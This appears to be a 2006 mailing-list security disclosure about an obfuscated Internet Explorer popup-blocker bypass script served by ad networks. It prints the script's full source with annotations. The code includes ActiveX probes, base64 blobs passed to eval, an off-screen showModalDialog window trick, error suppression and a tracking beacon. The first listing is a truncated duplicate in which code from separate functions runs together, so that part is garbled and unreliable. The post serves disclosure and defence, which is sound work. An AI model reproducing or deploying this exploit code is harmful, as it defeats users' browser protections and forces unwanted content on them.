Tribal Fusion and other advertising sites are using virtually identical
copies of a multi-exploit popup blocker bypass script. The script uses
exploits of ocget.dll, OffProv11 and OfficeObj10 classes, the Google
Toolbar, and JavaScript within a Shockwave Flash file. Some of the exploits
look like a shortcoming in IE's handling of MS Office integration.
The script is heavily obfuscated and I have not done a full analysis. I
did find a Securiteam partial analysis from last December at
http://blogs.securiteam.com/index.php/archives/138
The exploit is in the wild and appears to be common. Users of IE6 fully
patched except for Q912945 are being exploited. Not tested under any
other version.
The script's contents as of 2006-03-22 13:46:00 UTC-0000 are below.
/*
 * Truncated duplicate of the script listing. This copy is cut in several
 * places by the mail wrapping: the vV1 literal inside fV13 runs straight
 * into the tail of fV26, the base64 blob inside fV9 is missing a line, and
 * fV6, fV12, fV17, fV16, fV19, fV23, fV22 and fV28 are absent. It does not
 * parse and should not be used as a sample; the complete listing of the
 * same script appears later in this post.
 *
 * Pieces present here: oV1=window; fStart (entry point: plain window.open,
 * one-time fV13 init, oV2 request record, schedules fV10); fV11 (returns
 * the decoded vV1 markup); fV5 (always-true window.onerror handler); oV2
 * (builds the per-request record in vWA); fV13 (init, cut off); fV30/fV29/
 * fV33 (ActiveX classid probes, each chained to the next step through a
 * setTimeout string); fV7 (browser dispatcher, hooks body.onclick and on
 * non-IE injects the pop.swf embed); fV8 (retries every pending record with
 * the opener passed in); fV9 (post-attempt handler; eval of a beacon blob,
 * cut here); fV10 (timer callback from fStart).
 */
oV1=window; function fStart(u,n,v) { if (!oV1.opera) { var
twin=oV1.open(u,n,v); oV1.focus(); } if (!window.fV1) {fV13();} var
w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100);
return wo; } function fV11() {return fV6(vV1);} function fV5(x) { return
true; } function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array;
var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var
n=tn.getTime(); cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn="";
cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;};
return c } function fV13() { oV5=oV1.document; vWA=new Array;
fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout;
vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F
NjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20;
fV3('fV12()',200); } function fV30() { fV3('fV32?fV29():fV28()'); var
o=document.createElement('object');
o.onreadystatechange=function(){fV32=1};
o.classid='clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD';
o.onreadystatechange=function(){fV32=0}; } function fV29() {
fV3('fV31?fV28():fV33()'); var o=document.createElement('object');
o.onreadystatechange=function(){fV31=1};
o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC';
o.onreadystatechange=function(){fV31=0}; } function fV33() {
fV3('isG?fV16():fV26();'); var o=document.createElement('object');
o.onreadystatechange=function(){isG=1};
o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB';
o.onreadystatechange=function(){isG=0}; } function fV7() {
oV5.body.onclick=function() {fV8(oV1.open,3)}; if (oV5.createElement) {
fV24=oV5.getElementById; if (fV34) return; if (fV20) { if (fV21) {
fV30(); } else { fV33(); } } else { out='<embed swliveconnect="true"
src="http://cdn1.tribalfusion.com/media/common/pop/pop.swf" width="1"
height="1">'; fV19(out); if (!oV5.all) { x=oV5.getElementById('oV6');
x.focus(); x.value=Math.random(); } } } } function fV8(f,t,y) { for (var
i=0;i<vWA.length;i++) if (vWA[i].s==0) { vWA[i].s=-1; var wo=vWA[i];
wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA[i];
if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } function fV9(wo,s) { if (!s) s=0;
if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==5 && isG)
var t=fV3('fV26()',200); oV1.onerror=fV5; if (!oV1.opera)
{wo.f==-1?wo.pw.blur():wo.pw.focus();} if (wo.pw) { wo.s=2; fV2();
fV4(t);
eval(fV6('CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KS
V0LmNvbS92ZXJzaW9uMi9oaXRfdHJpYmFsLmNmbT90eXBlPScgKyBzOw0KCQl9'));
oV1.onerror=null; } } function fV10(w) { if (oV1.opera && !fV20)
{fV7();return;} wo=vWA[w]; fV9(wo); }
/* Ad-tag driver, truncated by the mail wrapping after 'left=' (the complete
 * statement appears in the full listing later in this post). TF_PopWidth,
 * TF_PopHeight and TF_PopUrl are expected from the embedding page; they are
 * not defined in this file. */
var l = (screen.width - TF_PopWidth) / 2 ; var t = (screen.height -
TF_PopHeight) / 2 ; var pop =
fStart(TF_PopUrl,'','height='+TF_PopHeight+',width='+TF_PopWidth+',left=
Tribal Fusion and other advertising sites are using virtually identical
copies of a multi-exploit popup blocker bypass script. The script uses
exploits of ocget.dll, OffProv11 and OfficeObj10 classes, the Google
Toolbar, and JavaScript within a Shockwave Flash file. Some of the exploits
look like a shortcoming in IE's handling of MS Office integration.
The script is heavily obfuscated and I have not done a full analysis. I
did find a Securiteam partial analysis from last December at
http://blogs.securiteam.com/index.php/archives/138
The exploit is in the wild and appears to be common. Users of IE6 fully
patched except for Q912945 are being exploited. Not tested under any
other version.
I found the hostile code at:
http://cdn5.tribalfusion.com/media/common/pop/pop-tf33.js
The script's contents as of 2006-03-22 13:46:00 UTC-0000 are below.
/*
 * Popup-blocker bypass / pop-under script as served by the ad network
 * (heavily obfuscated; the fVnn/oVnn/vVnn names are the originals). Mail
 * wrapping has split several string literals across physical lines (the
 * vV1 literal below, the base64 blobs further down), so this listing is
 * not runnable as printed; line breaks inside quotes are artifacts.
 *
 * Flow: the ad tag calls fStart(url, name, features). fStart tries a plain
 * window.open(), runs the one-time init fV13(), registers a request record
 * via oV2() and schedules fV10(). fV10 -> fV9 -> fV7 then selects the
 * bypass attempt for the detected browser (the fV30/fV29/fV33 ActiveX
 * probes, fV16 createPopup, fV26 javascript: iframe, fV28 + fV22 <object>
 * path; all defined further down). Every attempt ends in
 * fV8(opener, methodTag), which retries the pending records with the
 * opener it obtained.
 *
 * Globals written by fV13(): oV5=document, vWA=[] (request records),
 * fV1=window.open, fV2=window.focus, fV3=setTimeout, fV4=clearTimeout,
 * vV1=base64 of an <OBJECT ID='oV4' data='/favicon.ico'
 * type='application/xml'> tag, fV20=IE (document.all && !opera),
 * fV21=IE on 'NT 5.1' (XP), fV34=IE 7, isG/fV31/fV32=probe flags (0 until
 * a probe succeeds). fV25 is a retry budget shared by the timed attempts.
 *
 * Defender notes: on IE 7 the script gives up (fV7 returns when fV34 is
 * set); the post's author reports exploitation on IE6 hosts patched except
 * for Q912945. Static indicators: hidden elements with ids oV6
 * (<input onchange="fV8(fV1,5,true)">), oV10, oV3 and oV9; base64 blobs
 * passed to fV6() and then to eval()/document.write(); the classids in
 * fV30, fV29, fV33 and fV28; the pop.swf embed URL in fV7.
 */
/* oV1: alias for window. */ oV1=window; /* fStart(u,n,v): entry point. Non-Opera: a plain window.open(u,n,v) first (its result, whatever it is, lands in twin; on Opera twin stays undefined) and focus the opener. Runs fV13() once (fV1 is unset until then), registers the request via oV2(), stores twin in wo.pw and schedules fV10(index) after 100ms. Returns the record, not a window. */ function fStart(u,n,v) { if (!oV1.opera) { var
twin=oV1.open(u,n,v); oV1.focus(); } if (!window.fV1) {fV13();} var
w=oV2(u,n,v); var wo=vWA[w]; wo.pw=twin; fV3("fV10(" + w + ")",100);
return wo; } /* fV11: returns the decoded vV1 <OBJECT> markup; it is the javascript: source of the oV3 iframe injected by fV26. */ function fV11() {return fV6(vV1);} /* fV5: always true; installed as window.onerror to swallow script errors while the attempts run. */ function fV5(x) { return
true; } /* oV2(u,n,v): appends a request record to vWA and returns its index. Fields: location=u, n=window name (defaults to Date.getTime()), v=feature string (defaults to ''), f=focus flag (1 focused / -1 blurred, toggled by the blur/focus members; fV9 applies it to the real window), s=state (0 pending, -1 attempt in progress, 2 window obtained -- see fV8/fV9), cnt=index, cn set to '' and not read in this listing, pw=window handle filled in by the caller. */ function oV2(u,n,v) { var c = vWA.length; vWA[c] = new Array;
var cw = vWA[c]; var tn=new Date(); if (!v) var v=''; if (!n) var
n=tn.getTime(); cw.location=u; cw.f=1; cw.s=0; cw.n=n; cw.v=v; cw.cn="";
cw.cnt=c; cw.blur=function() {cw.f=-1;}; cw.focus=function() {cw.f=1;};
return c } /* fV13: one-time init (globals listed in the header). Saves the native open/focus/setTimeout/clearTimeout, derives the browser flags from document.all and navigator.appVersion, and document.write()s two decoded fragments: a hidden <input id="oV6" onchange="fV8(fV1,5,true)"> and <div id="oV10"></div>. */ function fV13() { oV5=oV1.document; vWA=new Array;
fV1=oV1.open; fV2=oV1.focus; fV3=setTimeout; fV4=clearTimeout;
vV1='PE9CSkVDVCBJRD0nb1Y0JyBkYXRhPScvZmF2aWNvbi5pY28nIHR5cGU9J2FwcGxpY2F
0aW9uL3htbCc+PC9PQkpFQ1Q+'; fV20=(document.all&&!oV1.opera)?1:0;
isG=fV31=fV32=0; fV21=fV20?(navigator.appVersion.indexOf('NT 5.1')>0):0;
fV34=fV20?(navigator.appVersion.indexOf('MSIE 7')>0):0;
oV5.write(fV6('PGlucHV0IHN0eWxlPSJ3aWR0aDowcHg7IHRvcDowcHg7IHBvc2l0aW9uO
mFic29sdXRlOyB2aXNpYmlsaXR5OmhpZGRlbjsiIGlkPSJvVjYiIG9uY2hhbmdlPSJmVjgoZ
lYxLDUsdHJ1ZSkiPg==')); oV5.write(fV6('PGRpdiBpZD0ib1YxMCI+PC9kaXY+'));
} /* debug: no-op stub. */ function debug() {void(0)} /* fV6(input): plain base64 decoder (standard alphabet, '=' padding; any other character is stripped first). Quirk: the do/while body runs at least once and keyStr.indexOf('') is 0, so an empty input yields three NUL characters instead of '' and a trailing partial group is decoded as if padded with 'A'. */ function fV6(input) { var o = ""; var chr1,
chr2, chr3; var enc1, enc2, enc3, enc4; var i = 0; var keyStr =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); do { enc1 =
keyStr.indexOf(input.charAt(i++)); enc2 =
keyStr.indexOf(input.charAt(i++)); enc3 =
keyStr.indexOf(input.charAt(i++)); enc4 =
keyStr.indexOf(input.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) |
enc4; o = o + String.fromCharCode(chr1); if (enc3 != 64) { o = o +
String.fromCharCode(chr2); } if (enc4 != 64) { o = o +
String.fromCharCode(chr3); } } while (i < input.length); return o; }
/* fV12: reach-through via the oV3 iframe (scheduled by fV26 and by fV17's
 * fallback). Decrements the fV25 retry budget and stops at zero; installs
 * onerror=fV5 and re-arms itself (500ms); then reads
 * oV3.oV4.object.parentWindow -- oV3/oV4 resolved by element id/name
 * (IE named-element globals, presumably), i.e. the <OBJECT
 * data='/favicon.ico' type='application/xml'> inside the hidden iframe --
 * into window.wO1, navigates the iframe to 'about:blank' (the decoded
 * literal) and schedules fV8(wO1.open,2) after 200ms. fV4(t) is reached
 * only if none of that threw, so an exception leaves the 500ms retry armed
 * and onerror suppresses the error. */
function fV12() { if (--fV25<1) return; oV1.onerror=fV5; var
t=fV3('fV12()',500); oV1.wO1=oV3.oV4.object.parentWindow;
oV3.location=fV6('YWJvdXQ6Ymxhbms='); fV3('fV8(wO1.open,2)',200);
fV4(t); } /* fV17: createPopup follow-up (scheduled by fV16). Once fV25 is exhausted it sets fV25=25 and hands over to fV12(). Otherwise it re-arms itself (250ms), stores oV8.children[0].parentWindow (presumably the popup document's window, reached through the injected <OBJECT>) in window.fV14, points fV1 at fV14.open, cancels the retry, removes the object and fires 'onchange' on the hidden oV6 input, whose handler calls fV8(fV1,5,true). */ function fV17() { if (--fV25<1) { fV25=25; var
t=fV3('fV12()'); return; } var x=fV3('fV17()',250);
oV1.fV14=oV8.children[0].parentWindow; fV1=fV14.open; fV4(x);
oV8.removeChild(oV8.children[0]); oV5.all['oV6'].fireEvent('onchange');
} /* fV16: createPopup path (from fV33 when isG is set). Opens an IE createPopup() popup, sets its body innerHTML to the decoded vV1 <OBJECT> markup, sets fV25=5 and schedules fV17() after 200ms. z and oV8 are implicit globals. */ function fV16() { z=createPopup(); oV8=z.document.body;
oV8.innerHTML=fV6(vV1); fV25=5; fV3('fV17()',200); } /* fV19(v): injects markup v -- into the oV10 div when present, otherwise into a new <span> appended to body. */ function fV19(v) {
if (oV5.getElementById('oV10')) {
oV5.getElementById('oV10').innerHTML=v; } else { var
o=oV5.createElement("span"); o.innerHTML=v; o.style.visibility =
"visible"; oV5.body.appendChild(o); } } /* fV23: fV8(fV1,4) -- retries the pending records with whatever opener fV1 currently holds, method tag 4 (scheduled from fV22). */ function fV23() { fV8(fV1,4); }
/* fV22: <object> path (scheduled by fV28). When fV25 reaches 0 it gives
 * up: clears fV21 so fV7 takes its non-XP branch, and re-runs fV7().
 * Otherwise it re-arms itself (750ms), fetches the oV9 <object> through
 * fV24 (getElementById) and, if it exposes a .DOM property, marks record
 * 0 in progress, cancels the retry, sets fV25=1 and eval()s a decoded
 * blob. That blob appears to build a showModalDialog(...) call whose
 * javascript: URL runs window.open('about:blank', wo.n, wo.v) from inside
 * a 1x1 dialog positioned off-screen and then closes it, executed through
 * o.DOM.Script.execScript(); afterwards record 0 is reset to pending, the
 * window is focused and fV23() is scheduled. Only vWA[0] is handled on
 * this path. The blob is split by mail wrapping in this listing. */
function fV22() { if (--fV25==0) {fV21=0; fV7(); return;} var wo=vWA[0];
var x=fV3('fV22()',750); var o=fV24('oV9'); if (o.DOM) { wo.s=-1;
fV4(x); fV25=1;
eval(fV6("dmFyIG91dD0ic2hvd01vZGFsRGlhbG9nKCdqYXZhc2NyaXB0OndpbmRvdy5vbm
Vycm9yPWZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9OyBzZXRUaW1lb3V0KFwid2luZG93LmNsb3
NlKClcIik7IHg9d2luZG93Lm9wZW4oXCJhYm91dDpibGFua1wiLFwiIiArIHdvLm4gKyAiXC
IsXCIiICsgd28udiArICJcIik7ICB4LmJsdXIoKTsgd2luZG93LmNsb3NlKCknLCcnLCdoZW
xwOjA7Y2VudGVyOjA7ZGlhbG9nV2lkdGg6MTtkaWFsb2dIZWlnaHQ6MTtkaWFsb2dMZWZ0Oj
UwMDA7ZGlhbG9nVG9wOjUwMDA7Jyk7Ijsgby5ET00uU2NyaXB0LmV4ZWNTY3JpcHQob3V0KT
s=")); wo.s=0; fV2(); fV3('fV23()'); } } /* fV28 (from fV30/fV29 probes): injects via fV19 a 1x1 <object id="oV9" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A"> (this classid appears to be the DHTML Editing control, whose .DOM property fV22 checks -- unverified here); both its onerror attribute and its fallback <SCRIPT> set fV25=1, so fV22's first decrement gives up when the control did not load. Sets fV25=6 and schedules fV22() after 500ms. */ function fV28() {
fV19(fV6('PG9iamVjdCBpZD0ib1Y5IiBvbmVycm9yPSJmVjI1PTEiIHN0eWxlPSJwb3NpdG
lvbjphYnNvbHV0ZTtsZWZ0OjE7dG9wOjE7d2lkdGg6MTtoZWlnaHQ6MSIgY2xhc3NpZD0iY2
xzaWQ6MkQzNjAyMDEtRkZGNS0xMWQxLThEMDMtMDBBMEM5NTlCQzBBIj48U0NSSVBUPmZWMj
U9MTwvU0NSSVBUPjwvb2JqZWN0Pg==')); fV25=6; fV3('fV22()',500) } /* fV26: javascript: iframe path (from fV33 when isG is clear, or from fV9 when s==5 && isG). Injects via fV19 a hidden 1x1 <IFRAME id="oV3" name="oV3" src="javascript:parent.fV11()"> so the frame document becomes the vV1 <OBJECT> markup, sets fV25=20 and schedules fV12() after 200ms. */ function
fV26() {
fV19(fV6('PElGUkFNRSBpZD0ib1YzIiBOQU1FPSJvVjMiIFNUWUxFPSJ2aXNpYmlsaXR5Om
hpZGRlbjsgcG9zaXRpb246YWJzb2x1dGU7d2lkdGg6MTtoZWlnaHQ6MTsiIHNyYz0iamF2YX
NjcmlwdDpwYXJlbnQuZlYxMSgpIj48L0lGUkFNRT4=')); fV25=20;
fV3('fV12()',200); } /* fV30 (IE on XP, from fV7): ActiveX presence probe. Schedules 'fV32?fV29():fV28()' with no delay, creates an <object>, sets onreadystatechange to fV32=1, assigns classid clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD and immediately re-points the handler at fV32=0 -- the code relies on readystatechange firing synchronously during the classid assignment when the control is installed, so fV32 stays 1 only in that case. */ function fV30() { fV3('fV32?fV29():fV28()'); var
o=document.createElement('object');
o.onreadystatechange=function(){fV32=1};
o.classid='clsid:D2BD7935-05FC-11D2-9059-00C04FD7A1BD';
o.onreadystatechange=function(){fV32=0}; } /* fV29: same probe for clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC into fV31; next step 'fV31?fV28():fV33()'. */ function fV29() {
fV3('fV31?fV28():fV33()'); var o=document.createElement('object');
o.onreadystatechange=function(){fV31=1};
o.classid='clsid:9E30754B-29A9-41CE-8892-70E9E07D15DC';
o.onreadystatechange=function(){fV31=0}; } /* fV33 (IE not on XP, or after the fV29 probe fails): same probe for clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB into isG (the flag name and the post's text suggest the Google Toolbar); next step 'isG?fV16():fV26();'. */ function fV33() {
fV3('isG?fV16():fV26();'); var o=document.createElement('object');
o.onreadystatechange=function(){isG=1};
o.classid='clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB';
o.onreadystatechange=function(){isG=0}; } /* fV7: bypass dispatcher (scheduled by fV9, re-run by fV22). Hooks body.onclick to fV8(oV1.open,3) so a user click retries with the native opener. Then, if createElement exists: caches getElementById as fV24; returns on IE 7 (fV34); IE on XP -> fV30() probe chain, other IE -> fV33(); other browsers -> injects a 1x1 <embed swliveconnect="true" src=".../pop.swf"> and, when document.all is absent, focuses the hidden oV6 input and writes Math.random() into it (its onchange handler calls fV8(fV1,5,true)). out and x are implicit globals. */ function fV7() {
oV5.body.onclick=function() {fV8(oV1.open,3)}; if (oV5.createElement) {
fV24=oV5.getElementById; if (fV34) return; if (fV20) { if (fV21) {
fV30(); } else { fV33(); } } else { out='<embed swliveconnect="true"
src="http://cdn1.tribalfusion.com/media/common/pop/pop.swf" width="1"
height="1">'; fV19(out); if (!oV5.all) { x=oV5.getElementById('oV6');
x.focus(); x.value=Math.random(); } } } } /* fV8(f,t,y): for each record still pending (s==0): mark it in progress (s=-1), open with f(location, n, v) and keep the result in pw, schedule a no-delay timer that flips s back to 0 if it is still -1 (the timer string re-derives wo from vWA by index), then fV9(wo,t). y is unused. */ function fV8(f,t,y) { for (var
i=0;i<vWA.length;i++) if (vWA[i].s==0) { vWA[i].s=-1; var wo=vWA[i];
wo.pw=f(wo.location,wo.n,wo.v); fV3("var i="+i+"; var wo=vWA[i];
if(wo.s==-1){wo.s=0}"); fV9(wo,t); } } /* fV9(wo,s): post-attempt handler; s tags the opener used (0 initial from fV10, 2 wO1.open from fV12, 3 click, 4 fV23, 5 oV6 onchange). Returns if wo.s>1 (already satisfied). s==0 schedules fV7() in 500ms; s==5 with isG schedules fV26() in 200ms. Installs onerror=fV5, then (non-Opera) blurs or focuses wo.pw according to wo.f. If wo.pw is truthy: s=2, window.focus(), clearTimeout(t) (t may be undefined here), eval() of a decoded blob that appears to be a roughly 5%-sampled beacon (new Image() whose src is 'http://www.adoutput.com/version2/hit_tribal.cfm?type=' + s), then onerror is cleared. The blob is split by mail wrapping in this listing. */ function fV9(wo,s) { if (!s) s=0;
if (wo.s > 1) return; if (s==0) var t=fV3("fV7()",500); if (s==5 && isG)
var t=fV3('fV26()',200); oV1.onerror=fV5; if (!oV1.opera)
{wo.f==-1?wo.pw.blur():wo.pw.focus();} if (wo.pw) { wo.s=2; fV2();
fV4(t);
eval(fV6('CQlpZiAoMSArIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqIDEwMCkgPCA2KS
B7DQoJCQl2YXIgeD1uZXcgSW1hZ2UoKTsNCgkJCXguc3JjPSdodHRwOi8vd3d3LmFkb3V0cH
V0LmNvbS92ZXJzaW9uMi9oaXRfdHJpYmFsLmNmbT90eXBlPScgKyBzOw0KCQl9'));
oV1.onerror=null; } } /* fV10(w): timer callback from fStart. On Opera (fV20 is always 0 there) it just runs fV7(); otherwise it fetches the record and runs fV9(wo) with s=0. wo is an implicit global here. */ function fV10(w) { if (oV1.opera && !fV20)
{fV7();return;} wo=vWA[w]; fV9(wo); }
/* Ad-tag driver. TF_PopWidth, TF_PopHeight and TF_PopUrl are expected from
 * the embedding page; they are not defined in this file. Centres the
 * window on the screen and requests it through fStart() with a chrome-less
 * feature string. pop is the request record returned by fStart, not a
 * window: pop.blur() only sets its f flag to -1, and fV9 later calls
 * pw.blur() on the real window when that flag is set, so the result ends
 * up behind the refocused opener (pop-under). Top-level var makes l, t and
 * pop properties of window. */
var l = (screen.width - TF_PopWidth) / 2 ; var t = (screen.height -
TF_PopHeight) / 2 ; var pop =
fStart(TF_PopUrl,'','height='+TF_PopHeight+',width='+TF_PopWidth+',left=
'+l+',top='+t+',toolbar=0,status=0,menubar=0,scrollbars=0,resizable=0');
pop.blur();
window.focus();